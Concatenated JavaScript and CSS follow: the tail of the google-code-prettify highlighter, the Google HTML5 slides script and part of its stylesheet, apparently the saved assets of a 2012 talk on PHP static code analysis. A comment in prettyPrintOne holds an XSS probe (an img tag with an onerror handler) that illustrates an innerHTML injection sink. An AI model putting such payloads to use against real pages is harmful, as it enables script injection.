(options['regexLiterals']) { var REGEX_LITERAL = ( // A regular expression literal starts with a slash that is // not followed by * or / so that it is not confused with // comments. '/(?=[^/*])' // and then contains any number of raw characters, + '(?:[^/\\x5B\\x5C]' // escape sequences (\x5C), + '|\\x5C[\\s\\S]' // or non-nesting character sets (\x5B\x5D); + '|\\x5B(?:[^\\x5C\\x5D]|\\x5C[\\s\\S])*(?:\\x5D|$))+' // finally closed by a /. + '/'); fallthroughStylePatterns.push( ['lang-regex', new RegExp('^' + REGEXP_PRECEDER_PATTERN + '(' + REGEX_LITERAL + ')') ]); } var keywords = options['keywords'].replace(/^\s+|\s+$/g, ''); if (keywords.length) { fallthroughStylePatterns.push( [PR_KEYWORD, new RegExp('^(?:' + keywords.replace(/\s+/g, '|') + ')\\b'), null]); } shortcutStylePatterns.push([PR_PLAIN, /^\s+/, null, ' \r\n\t\xA0']); fallthroughStylePatterns.push( // TODO(mikesamuel): recognize non-latin letters and numerals in idents [PR_LITERAL, /^@[a-z_$][a-z_$@0-9]*/i, null], [PR_TYPE, /^@?[A-Z]+[a-z][A-Za-z_$@0-9]*/, null], [PR_PLAIN, /^[a-z_$][a-z_$@0-9]*/i, null], [PR_LITERAL, new RegExp( '^(?:' // A hex number + '0x[a-f0-9]+' // or an octal or decimal number, + '|(?:\\d(?:_\\d+)*\\d*(?:\\.\\d*)?|\\.\\d\\+)' // possibly in scientific notation + '(?:e[+\\-]?\\d+)?' + ')' // with an optional modifier like UL for unsigned long + '[a-z]*', 'i'), null, '0123456789'], // Don't treat escaped quotes in bash as starting strings. See issue 144. [PR_PLAIN, /^\\[\s\S]?/, null], [PR_PUNCTUATION, /^.[^\s\w\.$@\'\"\`\/\#\\]*/, null]); return createSimpleLexer(shortcutStylePatterns, fallthroughStylePatterns); } var decorateSource = sourceDecorator({ 'keywords': ALL_KEYWORDS, 'hashComments': true, 'cStyleComments': true, 'multiLineStrings': true, 'regexLiterals': true }); /** * Given a DOM subtree, wraps it in a list, and puts each line into its own * list item. * * @param {Node} node modified in place. Its content is pulled into an * HTMLOListElement, and each line is moved into a separate list item. * This requires cloning elements, so the input might not have unique * IDs after numbering. */ function numberLines(node, opt_startLineNum) { var nocode = /(?:^|\s)nocode(?:\s|$)/; var lineBreak = /\r\n?|\n/; var document = node.ownerDocument; var whitespace; if (node.currentStyle) { whitespace = node.currentStyle.whiteSpace; } else if (window.getComputedStyle) { whitespace = document.defaultView.getComputedStyle(node, null) .getPropertyValue('white-space'); } // If it's preformatted, then we need to split lines on line breaks // in addition to <BR>s. var isPreformatted = whitespace && 'pre' === whitespace.substring(0, 3); var li = document.createElement('LI'); while (node.firstChild) { li.appendChild(node.firstChild); } // An array of lines. We split below, so this is initialized to one // un-split line. var listItems = [li]; function walk(node) { switch (node.nodeType) { case 1: // Element if (nocode.test(node.className)) { break; } if ('BR' === node.nodeName) { breakAfter(node); // Discard the <BR> since it is now flush against a </LI>. if (node.parentNode) { node.parentNode.removeChild(node); } } else { for (var child = node.firstChild; child; child = child.nextSibling) { walk(child); } } break; case 3: case 4: // Text if (isPreformatted) { var text = node.nodeValue; var match = text.match(lineBreak); if (match) { var firstLine = text.substring(0, match.index); node.nodeValue = firstLine; var tail = text.substring(match.index + match[0].length); if (tail) { var parent = node.parentNode; parent.insertBefore( document.createTextNode(tail), node.nextSibling); } breakAfter(node); if (!firstLine) { // Don't leave blank text nodes in the DOM. node.parentNode.removeChild(node); } } } break; } } // Split a line after the given node. function breakAfter(lineEndNode) { // If there's nothing to the right, then we can skip ending the line // here, and move root-wards since splitting just before an end-tag // would require us to create a bunch of empty copies. while (!lineEndNode.nextSibling) { lineEndNode = lineEndNode.parentNode; if (!lineEndNode) { return; } } function breakLeftOf(limit, copy) { // Clone shallowly if this node needs to be on both sides of the break. var rightSide = copy ? limit.cloneNode(false) : limit; var parent = limit.parentNode; if (parent) { // We clone the parent chain. // This helps us resurrect important styling elements that cross lines. // E.g. in <i>Foo<br>Bar</i> // should be rewritten to <li><i>Foo</i></li><li><i>Bar</i></li>. var parentClone = breakLeftOf(parent, 1); // Move the clone and everything to the right of the original // onto the cloned parent. var next = limit.nextSibling; parentClone.appendChild(rightSide); for (var sibling = next; sibling; sibling = next) { next = sibling.nextSibling; parentClone.appendChild(sibling); } } return rightSide; } var copiedListItem = breakLeftOf(lineEndNode.nextSibling, 0); // Walk the parent chain until we reach an unattached LI. for (var parent; // Check nodeType since IE invents document fragments. (parent = copiedListItem.parentNode) && parent.nodeType === 1;) { copiedListItem = parent; } // Put it on the list of lines for later processing. listItems.push(copiedListItem); } // Split lines while there are lines left to split. for (var i = 0; // Number of lines that have been split so far. i < listItems.length; // length updated by breakAfter calls. ++i) { walk(listItems[i]); } // Make sure numeric indices show correctly. if (opt_startLineNum === (opt_startLineNum|0)) { listItems[0].setAttribute('value', opt_startLineNum); } var ol = document.createElement('OL'); ol.className = 'linenums'; var offset = Math.max(0, ((opt_startLineNum - 1 /* zero index */)) | 0) || 0; for (var i = 0, n = listItems.length; i < n; ++i) { li = listItems[i]; // Stick a class on the LIs so that stylesheets can // color odd/even rows, or any other row pattern that // is co-prime with 10. li.className = 'L' + ((i + offset) % 10); if (!li.firstChild) { li.appendChild(document.createTextNode('\xA0')); } ol.appendChild(li); } node.appendChild(ol); } /** * Breaks {@code job.source} around style boundaries in {@code job.decorations} * and modifies {@code job.sourceNode} in place. * @param {Object} job like <pre>{ * source: {string} source as plain text, * spans: {Array.<number|Node>} alternating span start indices into source * and the text node or element (e.g. {@code <BR>}) corresponding to that * span. * decorations: {Array.<number|string} an array of style classes preceded * by the position at which they start in job.source in order * }</pre> * @private */ function recombineTagsAndDecorations(job) { var isIE = /\bMSIE\b/.test(navigator.userAgent); var newlineRe = /\n/g; var source = job.source; var sourceLength = source.length; // Index into source after the last code-unit recombined. var sourceIndex = 0; var spans = job.spans; var nSpans = spans.length; // Index into spans after the last span which ends at or before sourceIndex. var spanIndex = 0; var decorations = job.decorations; var nDecorations = decorations.length; // Index into decorations after the last decoration which ends at or before sourceIndex. var decorationIndex = 0; // Simplify decorations. var decPos = 0; for (var i = 0; i < nDecorations;) { // Skip over any zero-length decorations. var startPos = decorations[i]; var start = i; while (start + 2 < nDecorations && decorations[start + 2] === startPos) { start += 2; } // Conflate all adjacent decorations that use the same style. var startDec = decorations[start + 1]; var end = start + 2; while (end + 2 <= nDecorations && (decorations[end + 1] === startDec || decorations[end] === decorations[end + 2])) { end += 2; } decorations[decPos++] = startPos; decorations[decPos++] = startDec; i = end; } // Strip any zero-length decoration at the end. if (decPos && decorations[decPos - 2] === sourceLength) { decPos -= 2; } nDecorations = decorations.length = decPos; var decoration = null; while (spanIndex < nSpans) { var spanStart = spans[spanIndex]; var spanEnd = spans[spanIndex + 2] || sourceLength; var decStart = decorations[decorationIndex]; var decEnd = decorations[decorationIndex + 2] || sourceLength; var end = Math.min(spanEnd, decEnd); var textNode = spans[spanIndex + 1]; if (textNode.nodeType !== 1) { // Don't muck with <BR>s or <LI>s var styledText = source.substring(sourceIndex, end); // This may seem bizarre, and it is. Emitting LF on IE causes the // code to display with spaces instead of line breaks. // Emitting Windows standard issue linebreaks (CRLF) causes a blank // space to appear at the beginning of every line but the first. // Emitting an old Mac OS 9 line separator makes everything spiffy. if (isIE) { styledText = styledText.replace(newlineRe, '\r'); } textNode.nodeValue = styledText; var document = textNode.ownerDocument; var span = document.createElement('SPAN'); span.className = decorations[decorationIndex + 1]; var parentNode = textNode.parentNode; parentNode.replaceChild(span, textNode); span.appendChild(textNode); if (sourceIndex < spanEnd) { // Split off a text node. spans[spanIndex + 1] = textNode // TODO: Possibly optimize by using '' if there's no flicker. = document.createTextNode(source.substring(end, spanEnd)); parentNode.insertBefore(textNode, span.nextSibling); } } sourceIndex = end; if (sourceIndex >= spanEnd) { spanIndex += 2; } if (sourceIndex >= decEnd) { decorationIndex += 2; } } } /** Maps language-specific file extensions to handlers. */ var langHandlerRegistry = {}; /** Register a language handler for the given file extensions. * @param {function (Object)} handler a function from source code to a list * of decorations. Takes a single argument job which describes the * state of the computation. The single parameter has the form * {@code { * source: {string} as plain text. * decorations: {Array.<number|string>} an array of style classes * preceded by the position at which they start in * job.source in order. * The language handler should assigned this field. * basePos: {int} the position of source in the larger source chunk. * All positions in the output decorations array are relative * to the larger source chunk. * } } * @param {Array.<string>} fileExtensions */ function registerLangHandler(handler, fileExtensions) { for (var i = fileExtensions.length; --i >= 0;) { var ext = fileExtensions[i]; if (!langHandlerRegistry.hasOwnProperty(ext)) { langHandlerRegistry[ext] = handler; } else if ('console' in window) { console['warn']('cannot override language handler %s', ext); } } } function langHandlerForExtension(extension, source) { if (!(extension && langHandlerRegistry.hasOwnProperty(extension))) { // Treat it as markup if the first non whitespace character is a < and // the last non-whitespace character is a >. extension = /^\s*</.test(source) ? 'default-markup' : 'default-code'; } return langHandlerRegistry[extension]; } registerLangHandler(decorateSource, ['default-code']); registerLangHandler( createSimpleLexer( [], [ [PR_PLAIN, /^[^<?]+/], [PR_DECLARATION, /^<!\w[^>]*(?:>|$)/], [PR_COMMENT, /^<\!--[\s\S]*?(?:-\->|$)/], // Unescaped content in an unknown language ['lang-', /^<\?([\s\S]+?)(?:\?>|$)/], ['lang-', /^<%([\s\S]+?)(?:%>|$)/], [PR_PUNCTUATION, /^(?:<[%?]|[%?]>)/], ['lang-', /^<xmp\b[^>]*>([\s\S]+?)<\/xmp\b[^>]*>/i], // Unescaped content in javascript. (Or possibly vbscript). ['lang-js', /^<script\b[^>]*>([\s\S]*?)(<\/script\b[^>]*>)/i], // Contains unescaped stylesheet content ['lang-css', /^<style\b[^>]*>([\s\S]*?)(<\/style\b[^>]*>)/i], ['lang-in.tag', /^(<\/?[a-z][^<>]*>)/i] ]), ['default-markup', 'htm', 'html', 'mxml', 'xhtml', 'xml', 'xsl']); registerLangHandler( createSimpleLexer( [ [PR_PLAIN, /^[\s]+/, null, ' \t\r\n'], [PR_ATTRIB_VALUE, /^(?:\"[^\"]*\"?|\'[^\']*\'?)/, null, '\"\''] ], [ [PR_TAG, /^^<\/?[a-z](?:[\w.:-]*\w)?|\/?>$/i], [PR_ATTRIB_NAME, /^(?!style[\s=]|on)[a-z](?:[\w:-]*\w)?/i], ['lang-uq.val', /^=\s*([^>\'\"\s]*(?:[^>\'\"\s\/]|\/(?=\s)))/], [PR_PUNCTUATION, /^[=<>\/]+/], ['lang-js', /^on\w+\s*=\s*\"([^\"]+)\"/i], ['lang-js', /^on\w+\s*=\s*\'([^\']+)\'/i], ['lang-js', /^on\w+\s*=\s*([^\"\'>\s]+)/i], ['lang-css', /^style\s*=\s*\"([^\"]+)\"/i], ['lang-css', /^style\s*=\s*\'([^\']+)\'/i], ['lang-css', /^style\s*=\s*([^\"\'>\s]+)/i] ]), ['in.tag']); registerLangHandler( createSimpleLexer([], [[PR_ATTRIB_VALUE, /^[\s\S]+/]]), ['uq.val']); registerLangHandler(sourceDecorator({ 'keywords': CPP_KEYWORDS, 'hashComments': true, 'cStyleComments': true }), ['c', 'cc', 'cpp', 'cxx', 'cyc', 'm']); registerLangHandler(sourceDecorator({ 'keywords': 'null true false' }), ['json']); registerLangHandler(sourceDecorator({ 'keywords': CSHARP_KEYWORDS, 'hashComments': true, 'cStyleComments': true, 'verbatimStrings': true }), ['cs']); registerLangHandler(sourceDecorator({ 'keywords': JAVA_KEYWORDS, 'cStyleComments': true }), ['java']); registerLangHandler(sourceDecorator({ 'keywords': SH_KEYWORDS, 'hashComments': true, 'multiLineStrings': true }), ['bsh', 'csh', 'sh']); registerLangHandler(sourceDecorator({ 'keywords': PYTHON_KEYWORDS, 'hashComments': true, 'multiLineStrings': true, 'tripleQuotedStrings': true }), ['cv', 'py']); registerLangHandler(sourceDecorator({ 'keywords': PERL_KEYWORDS, 'hashComments': true, 'multiLineStrings': true, 'regexLiterals': true }), ['perl', 'pl', 'pm']); registerLangHandler(sourceDecorator({ 'keywords': RUBY_KEYWORDS, 'hashComments': true, 'multiLineStrings': true, 'regexLiterals': true }), ['rb']); registerLangHandler(sourceDecorator({ 'keywords': JSCRIPT_KEYWORDS, 'cStyleComments': true, 'regexLiterals': true }), ['js']); registerLangHandler(sourceDecorator({ 'keywords': COFFEE_KEYWORDS, 'hashComments': 3, // ### style block comments 'cStyleComments': true, 'multilineStrings': true, 'tripleQuotedStrings': true, 'regexLiterals': true }), ['coffee']); registerLangHandler(createSimpleLexer([], [[PR_STRING, /^[\s\S]+/]]), ['regex']); function applyDecorator(job) { var opt_langExtension = job.langExtension; try { // Extract tags, and convert the source code to plain text. var sourceAndSpans = extractSourceSpans(job.sourceNode); /** Plain text. @type {string} */ var source = sourceAndSpans.source; job.source = source; job.spans = sourceAndSpans.spans; job.basePos = 0; // Apply the appropriate language handler langHandlerForExtension(opt_langExtension, source)(job); // Integrate the decorations and tags back into the source code, // modifying the sourceNode in place. recombineTagsAndDecorations(job); } catch (e) { if ('console' in window) { console['log'](e && e['stack'] ? e['stack'] : e); } } } /** * @param sourceCodeHtml {string} The HTML to pretty print. * @param opt_langExtension {string} The language name to use. * Typically, a filename extension like 'cpp' or 'java'. * @param opt_numberLines {number|boolean} True to number lines, * or the 1-indexed number of the first line in sourceCodeHtml. */ function prettyPrintOne(sourceCodeHtml, opt_langExtension, opt_numberLines) { var container = document.createElement('PRE'); // This could cause images to load and onload listeners to fire. // E.g. <img onerror="alert(1337)" src="nosuchimage.png">. // We assume that the inner HTML is from a trusted source. container.innerHTML = sourceCodeHtml; if (opt_numberLines) { numberLines(container, opt_numberLines); } var job = { langExtension: opt_langExtension, numberLines: opt_numberLines, sourceNode: container }; applyDecorator(job); return container.innerHTML; } function prettyPrint(opt_whenDone) { function byTagName(tn) { return document.getElementsByTagName(tn); } // fetch a list of nodes to rewrite var codeSegments = [byTagName('pre'), byTagName('code'), byTagName('xmp')]; var elements = []; for (var i = 0; i < codeSegments.length; ++i) { for (var j = 0, n = codeSegments[i].length; j < n; ++j) { elements.push(codeSegments[i][j]); } } codeSegments = null; var clock = Date; if (!clock['now']) { clock = { 'now': function () { return (new Date).getTime(); } }; } // The loop is broken into a series of continuations to make sure that we // don't make the browser unresponsive when rewriting a large page. var k = 0; var prettyPrintingJob; function doWork() { var endTime = (window['PR_SHOULD_USE_CONTINUATION'] ? clock.now() + 250 /* ms */ : Infinity); for (; k < elements.length && clock.now() < endTime; k++) { var cs = elements[k]; if (cs.className && cs.className.indexOf('prettyprint') >= 0) { // If the classes includes a language extensions, use it. // Language extensions can be specified like // <pre class="prettyprint lang-cpp"> // the language extension "cpp" is used to find a language handler as // passed to PR.registerLangHandler. var langExtension = cs.className.match(/\blang-(\w+)\b/); if (langExtension) { langExtension = langExtension[1]; } // make sure this is not nested in an already prettified element var nested = false; for (var p = cs.parentNode; p; p = p.parentNode) { if ((p.tagName === 'pre' || p.tagName === 'code' || p.tagName === 'xmp') && p.className && p.className.indexOf('prettyprint') >= 0) { nested = true; break; } } if (!nested) { // Look for a class like linenums or linenums:<n> where <n> is the // 1-indexed number of the first line. var lineNums = cs.className.match(/\blinenums\b(?::(\d+))?/); lineNums = lineNums ? lineNums[1] && lineNums[1].length ? +lineNums[1] : true : false; if (lineNums) { numberLines(cs, lineNums); } // do the pretty printing prettyPrintingJob = { langExtension: langExtension, sourceNode: cs, numberLines: lineNums }; applyDecorator(prettyPrintingJob); } } } if (k < elements.length) { // finish up in a continuation setTimeout(doWork, 250); } else if (opt_whenDone) { opt_whenDone(); } } doWork(); } window['prettyPrintOne'] = prettyPrintOne; window['prettyPrint'] = prettyPrint; window['PR'] = { 'createSimpleLexer': createSimpleLexer, 'registerLangHandler': registerLangHandler, 'sourceDecorator': sourceDecorator, 'PR_ATTRIB_NAME': PR_ATTRIB_NAME, 'PR_ATTRIB_VALUE': PR_ATTRIB_VALUE, 'PR_COMMENT': PR_COMMENT, 'PR_DECLARATION': PR_DECLARATION, 'PR_KEYWORD': PR_KEYWORD, 'PR_LITERAL': PR_LITERAL, 'PR_NOCODE': PR_NOCODE, 'PR_PLAIN': PR_PLAIN, 'PR_PUNCTUATION': PR_PUNCTUATION, 'PR_SOURCE': PR_SOURCE, 'PR_STRING': PR_STRING, 'PR_TAG': PR_TAG, 'PR_TYPE': PR_TYPE }; })(); ================================================ FILE: papers/LCA 2012_ PHP Static Code Analysis_files/slides.txt ================================================ /* Google HTML5 slides template Authors: Luke Mahé (code) Marcin Wichary (code and design) Dominic Mazzoni (browser compatibility) Charles Chen (ChromeVox support) URL: http://code.google.com/p/html5slides/ */ var PERMANENT_URL_PREFIX = 'http://html5slides.googlecode.com/svn/trunk/'; var SLIDE_CLASSES = ['far-past', 'past', 'current', 'next', 'far-next']; var PM_TOUCH_SENSITIVITY = 15; var curSlide; /* ---------------------------------------------------------------------- */ /* classList polyfill by Eli Grey * (http://purl.eligrey.com/github/classList.js/blob/master/classList.js) */ if (typeof document !== "undefined" && !("classList" in document.createElement("a"))) { (function (view) { var classListProp = "classList" , protoProp = "prototype" , elemCtrProto = (view.HTMLElement || view.Element)[protoProp] , objCtr = Object strTrim = String[protoProp].trim || function () { return this.replace(/^\s+|\s+$/g, ""); } , arrIndexOf = Array[protoProp].indexOf || function (item) { for (var i = 0, len = this.length; i < len; i++) { if (i in this && this[i] === item) { return i; } } return -1; } // Vendors: please allow content code to instantiate DOMExceptions , DOMEx = function (type, message) { this.name = type; this.code = DOMException[type]; this.message = message; } , checkTokenAndGetIndex = function (classList, token) { if (token === "") { throw new DOMEx( "SYNTAX_ERR" , "An invalid or illegal string was specified" ); } if (/\s/.test(token)) { throw new DOMEx( "INVALID_CHARACTER_ERR" , "String contains an invalid character" ); } return arrIndexOf.call(classList, token); } , ClassList = function (elem) { var trimmedClasses = strTrim.call(elem.className) , classes = trimmedClasses ? trimmedClasses.split(/\s+/) : [] ; for (var i = 0, len = classes.length; i < len; i++) { this.push(classes[i]); } this._updateClassName = function () { elem.className = this.toString(); }; } , classListProto = ClassList[protoProp] = [] , classListGetter = function () { return new ClassList(this); } ; // Most DOMException implementations don't allow calling DOMException's toString() // on non-DOMExceptions. Error's toString() is sufficient here. DOMEx[protoProp] = Error[protoProp]; classListProto.item = function (i) { return this[i] || null; }; classListProto.contains = function (token) { token += ""; return checkTokenAndGetIndex(this, token) !== -1; }; classListProto.add = function (token) { token += ""; if (checkTokenAndGetIndex(this, token) === -1) { this.push(token); this._updateClassName(); } }; classListProto.remove = function (token) { token += ""; var index = checkTokenAndGetIndex(this, token); if (index !== -1) { this.splice(index, 1); this._updateClassName(); } }; classListProto.toggle = function (token) { token += ""; if (checkTokenAndGetIndex(this, token) === -1) { this.add(token); } else { this.remove(token); } }; classListProto.toString = function () { return this.join(" "); }; if (objCtr.defineProperty) { var classListPropDesc = { get: classListGetter , enumerable: true , configurable: true }; try { objCtr.defineProperty(elemCtrProto, classListProp, classListPropDesc); } catch (ex) { // IE 8 doesn't support enumerable:true if (ex.number === -0x7FF5EC54) { classListPropDesc.enumerable = false; objCtr.defineProperty(elemCtrProto, classListProp, classListPropDesc); } } } else if (objCtr[protoProp].__defineGetter__) { elemCtrProto.__defineGetter__(classListProp, classListGetter); } }(self)); } /* ---------------------------------------------------------------------- */ /* Slide movement */ function getSlideEl(no) { if ((no < 0) || (no >= slideEls.length)) { return null; } else { return slideEls[no]; } }; function updateSlideClass(slideNo, className) { var el = getSlideEl(slideNo); if (!el) { return; } if (className) { el.classList.add(className); } for (var i in SLIDE_CLASSES) { if (className != SLIDE_CLASSES[i]) { el.classList.remove(SLIDE_CLASSES[i]); } } }; function updateSlides() { for (var i = 0; i < slideEls.length; i++) { switch (i) { case curSlide - 2: updateSlideClass(i, 'far-past'); break; case curSlide - 1: updateSlideClass(i, 'past'); break; case curSlide: updateSlideClass(i, 'current'); break; case curSlide + 1: updateSlideClass(i, 'next'); break; case curSlide + 2: updateSlideClass(i, 'far-next'); break; default: updateSlideClass(i); break; } } triggerLeaveEvent(curSlide - 1); triggerEnterEvent(curSlide); window.setTimeout(function() { // Hide after the slide disableSlideFrames(curSlide - 2); }, 301); enableSlideFrames(curSlide - 1); enableSlideFrames(curSlide + 2); if (isChromeVoxActive()) { speakAndSyncToNode(slideEls[curSlide]); } updateHash(); }; function buildNextItem() { var toBuild = slideEls[curSlide].querySelectorAll('.to-build'); if (!toBuild.length) { return false; } toBuild[0].classList.remove('to-build'); if (isChromeVoxActive()) { speakAndSyncToNode(toBuild[0]); } return true; }; function prevSlide() { if (curSlide > 0) { curSlide--; updateSlides(); } }; function nextSlide() { if (buildNextItem()) { return; } if (curSlide < slideEls.length - 1) { curSlide++; updateSlides(); } }; /* Slide events */ function triggerEnterEvent(no) { var el = getSlideEl(no); if (!el) { return; } var onEnter = el.getAttribute('onslideenter'); if (onEnter) { new Function(onEnter).call(el); } var evt = document.createEvent('Event'); evt.initEvent('slideenter', true, true); evt.slideNumber = no + 1; // Make it readable el.dispatchEvent(evt); }; function triggerLeaveEvent(no) { var el = getSlideEl(no); if (!el) { return; } var onLeave = el.getAttribute('onslideleave'); if (onLeave) { new Function(onLeave).call(el); } var evt = document.createEvent('Event'); evt.initEvent('slideleave', true, true); evt.slideNumber = no + 1; // Make it readable el.dispatchEvent(evt); }; /* Touch events */ function handleTouchStart(event) { if (event.touches.length == 1) { touchDX = 0; touchDY = 0; touchStartX = event.touches[0].pageX; touchStartY = event.touches[0].pageY; document.body.addEventListener('touchmove', handleTouchMove, true); document.body.addEventListener('touchend', handleTouchEnd, true); } }; function handleTouchMove(event) { if (event.touches.length > 1) { cancelTouch(); } else { touchDX = event.touches[0].pageX - touchStartX; touchDY = event.touches[0].pageY - touchStartY; } }; function handleTouchEnd(event) { var dx = Math.abs(touchDX); var dy = Math.abs(touchDY); if ((dx > PM_TOUCH_SENSITIVITY) && (dy < (dx * 2 / 3))) { if (touchDX > 0) { prevSlide(); } else { nextSlide(); } } cancelTouch(); }; function cancelTouch() { document.body.removeEventListener('touchmove', handleTouchMove, true); document.body.removeEventListener('touchend', handleTouchEnd, true); }; /* Preloading frames */ function disableSlideFrames(no) { var el = getSlideEl(no); if (!el) { return; } var frames = el.getElementsByTagName('iframe'); for (var i = 0, frame; frame = frames[i]; i++) { disableFrame(frame); } }; function enableSlideFrames(no) { var el = getSlideEl(no); if (!el) { return; } var frames = el.getElementsByTagName('iframe'); for (var i = 0, frame; frame = frames[i]; i++) { enableFrame(frame); } }; function disableFrame(frame) { frame.src = 'about:blank'; }; function enableFrame(frame) { var src = frame._src; if (frame.src != src && src != 'about:blank') { frame.src = src; } }; function setupFrames() { var frames = document.querySelectorAll('iframe'); for (var i = 0, frame; frame = frames[i]; i++) { frame._src = frame.src; disableFrame(frame); } enableSlideFrames(curSlide); enableSlideFrames(curSlide + 1); enableSlideFrames(curSlide + 2); }; function setupInteraction() { /* Clicking and tapping */ var el = document.createElement('div'); el.className = 'slide-area'; el.id = 'prev-slide-area'; el.addEventListener('click', prevSlide, false); document.querySelector('section.slides').appendChild(el); var el = document.createElement('div'); el.className = 'slide-area'; el.id = 'next-slide-area'; el.addEventListener('click', nextSlide, false); document.querySelector('section.slides').appendChild(el); /* Swiping */ document.body.addEventListener('touchstart', handleTouchStart, false); } /* ChromeVox support */ function isChromeVoxActive() { if (typeof(cvox) == 'undefined') { return false; } else { return true; } }; function speakAndSyncToNode(node) { if (!isChromeVoxActive()) { return; } cvox.ChromeVox.navigationManager.switchToStrategy( cvox.ChromeVoxNavigationManager.STRATEGIES.LINEARDOM, 0, true); cvox.ChromeVox.navigationManager.syncToNode(node); cvox.ChromeVoxUserCommands.finishNavCommand(''); var target = node; while (target.firstChild) { target = target.firstChild; } cvox.ChromeVox.navigationManager.syncToNode(target); }; function speakNextItem() { if (!isChromeVoxActive()) { return; } cvox.ChromeVox.navigationManager.switchToStrategy( cvox.ChromeVoxNavigationManager.STRATEGIES.LINEARDOM, 0, true); cvox.ChromeVox.navigationManager.next(true); if (!cvox.DomUtil.isDescendantOfNode( cvox.ChromeVox.navigationManager.getCurrentNode(), slideEls[curSlide])){ var target = slideEls[curSlide]; while (target.firstChild) { target = target.firstChild; } cvox.ChromeVox.navigationManager.syncToNode(target); cvox.ChromeVox.navigationManager.next(true); } cvox.ChromeVoxUserCommands.finishNavCommand(''); }; function speakPrevItem() { if (!isChromeVoxActive()) { return; } cvox.ChromeVox.navigationManager.switchToStrategy( cvox.ChromeVoxNavigationManager.STRATEGIES.LINEARDOM, 0, true); cvox.ChromeVox.navigationManager.previous(true); if (!cvox.DomUtil.isDescendantOfNode( cvox.ChromeVox.navigationManager.getCurrentNode(), slideEls[curSlide])){ var target = slideEls[curSlide]; while (target.lastChild){ target = target.lastChild; } cvox.ChromeVox.navigationManager.syncToNode(target); cvox.ChromeVox.navigationManager.previous(true); } cvox.ChromeVoxUserCommands.finishNavCommand(''); }; /* Hash functions */ function getCurSlideFromHash() { var slideNo = parseInt(location.hash.substr(1)); if (slideNo) { curSlide = slideNo - 1; } else { curSlide = 0; } }; function updateHash() { location.replace('#' + (curSlide + 1)); }; /* Event listeners */ function handleBodyKeyDown(event) { switch (event.keyCode) { case 39: // right arrow case 13: // Enter case 32: // space case 34: // PgDn nextSlide(); event.preventDefault(); break; case 37: // left arrow case 8: // Backspace case 33: // PgUp prevSlide(); event.preventDefault(); break; case 40: // down arrow if (isChromeVoxActive()) { speakNextItem(); } else { nextSlide(); } event.preventDefault(); break; case 38: // up arrow if (isChromeVoxActive()) { speakPrevItem(); } else { prevSlide(); } event.preventDefault(); break; } }; function addEventListeners() { document.addEventListener('keydown', handleBodyKeyDown, false); }; /* Initialization */ function addPrettify() { var els = document.querySelectorAll('pre'); for (var i = 0, el; el = els[i]; i++) { if (!el.classList.contains('noprettyprint')) { el.classList.add('prettyprint'); } } var el = document.createElement('script'); el.type = 'text/javascript'; el.src = PERMANENT_URL_PREFIX + 'prettify.js'; el.onload = function() { prettyPrint(); } document.body.appendChild(el); }; function addFontStyle() { var el = document.createElement('link'); el.rel = 'stylesheet'; el.type = 'text/css'; el.href = 'http://fonts.googleapis.com/css?family=' + 'Open+Sans:regular,semibold,italic,italicsemibold|Droid+Sans+Mono'; document.body.appendChild(el); }; function addGeneralStyle() { var el = document.createElement('link'); el.rel = 'stylesheet'; el.type = 'text/css'; el.href = PERMANENT_URL_PREFIX + 'styles.css'; document.body.appendChild(el); var el = document.createElement('meta'); el.name = 'viewport'; el.content = 'width=1100,height=750'; document.querySelector('head').appendChild(el); var el = document.createElement('meta'); el.name = 'apple-mobile-web-app-capable'; el.content = 'yes'; document.querySelector('head').appendChild(el); }; function makeBuildLists() { for (var i = curSlide, slide; slide = slideEls[i]; i++) { var items = slide.querySelectorAll('.build > *'); for (var j = 0, item; item = items[j]; j++) { if (item.classList) { item.classList.add('to-build'); } } } }; function handleDomLoaded() { slideEls = document.querySelectorAll('section.slides > article'); setupFrames(); addFontStyle(); addGeneralStyle(); addPrettify(); addEventListeners(); updateSlides(); setupInteraction(); makeBuildLists(); document.body.classList.add('loaded'); }; function initialize() { getCurSlideFromHash(); if (window['_DEBUG']) { PERMANENT_URL_PREFIX = '../'; } if (window['_DCL']) { handleDomLoaded(); } else { document.addEventListener('DOMContentLoaded', handleDomLoaded, false); } } // If ?debug exists then load the script relative instead of absolute if (!window['_DEBUG'] && document.location.href.indexOf('?debug') !== -1) { document.addEventListener('DOMContentLoaded', function() { // Avoid missing the DomContentLoaded event window['_DCL'] = true }, false); window['_DEBUG'] = true; var script = document.createElement('script'); script.type = 'text/javascript'; script.src = '../slides.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(script, s); // Remove this script s.parentNode.removeChild(s); } else { initialize(); } ================================================ FILE: papers/LCA 2012_ PHP Static Code Analysis_files/styles.css ================================================ /* Google HTML5 slides template Authors: Luke Mahé (code) Marcin Wichary (code and design) Dominic Mazzoni (browser compatibility) Charles Chen (ChromeVox support) URL: http://code.google.com/p/html5slides/ */ /* Framework */ html { height: 100%; } body { margin: 0; padding: 0; display: block !important; height: 100%; min-height: 740px; overflow-x: hidden; overflow-y: auto; background: rgb(215, 215, 215); background: -o-radial-gradient(rgb(240, 240, 240), rgb(190, 190, 190)); background: -moz-radial-gradient(rgb(240, 240, 240), rgb(190, 190, 190)); background: -webkit-radial-gradient(rgb(240, 240, 240), rgb(190, 190, 190)); background: -webkit-gradient(radial, 50% 50%, 0, 50% 50%, 500, from(rgb(240, 240, 240)), to(rgb(190, 190, 190))); -webkit-font-smoothing: antialiased; } .slides { width: 100%; height: 100%; left: 0; top: 0; position: absolute; -webkit-transform: translate3d(0, 0, 0); } .slides > article { display: block; position: absolute; overflow: hidden; width: 900px; height: 700px; left: 50%; top: 50%; margin-left: -450px; margin-top: -350px; padding: 40px 60px; box-sizing: border-box; -o-box-sizing: border-box; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; border-radius: 10px; -o-border-radius: 10px; -moz-border-radius: 10px; -webkit-border-radius: 10px; background-color: white; box-shadow: 0 2px 6px rgba(0, 0, 0, .1); border: 1px solid rgba(0, 0, 0, .3); transition: transform .3s ease-out; -o-transition: -o-transform .3s ease-out; -moz-transition: -moz-transform .3s ease-out; -webkit-transition: -webkit-transform .3s ease-out; } .slides.layout-widescreen > article { margin-left: -550px; width: 1100px; } .slides.layout-faux-widescreen > article { margin-left: -550px; width: 1100px; padding: 40px 160px; } .slides.template-default > article:not(.nobackground):not(.biglogo) { background: url(images/google-logo-small.png) 710px 625px no-repeat; background-color: white; } .slides.template-io2011 > article:not(.nobackground):not(.biglogo) { background: url(images/colorbar.png) 0 600px repeat-x, url(images/googleio-logo.png) 640px 625px no-repeat; background-size: 100%, 225px; background-color: white; } .slides.layout-widescreen > 